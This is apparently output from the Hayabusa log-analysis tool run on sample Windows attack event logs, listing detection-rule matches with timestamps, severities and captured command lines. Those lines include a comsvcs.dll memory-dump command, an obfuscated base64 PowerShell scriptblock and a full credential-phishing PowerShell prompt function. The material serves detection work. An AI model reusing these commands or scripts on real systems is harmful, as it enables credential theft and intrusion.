Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx 2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.396 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-08-30 21:54:08.439 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx 2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx 2019-09-01 21:04:22.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx 2019-09-01 21:04:22.908 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx 2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:58.463 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:05:22.837 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:33:24.177 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:34:37.129 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:36:26.005 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-06 22:49:35.433 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx 2019-09-06 22:49:39.823 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 747F3D96-3944-5D72-0000-001019773200,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx 2019-09-06 23:58:44.918 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx 2019-09-09 04:14:54.471 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx 2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx 2019-09-09 22:35:08.655 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:08.655 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx 2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx 2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx 2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx 2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx 2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 747F3D96-2842-5E1E-0000-00100C417A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 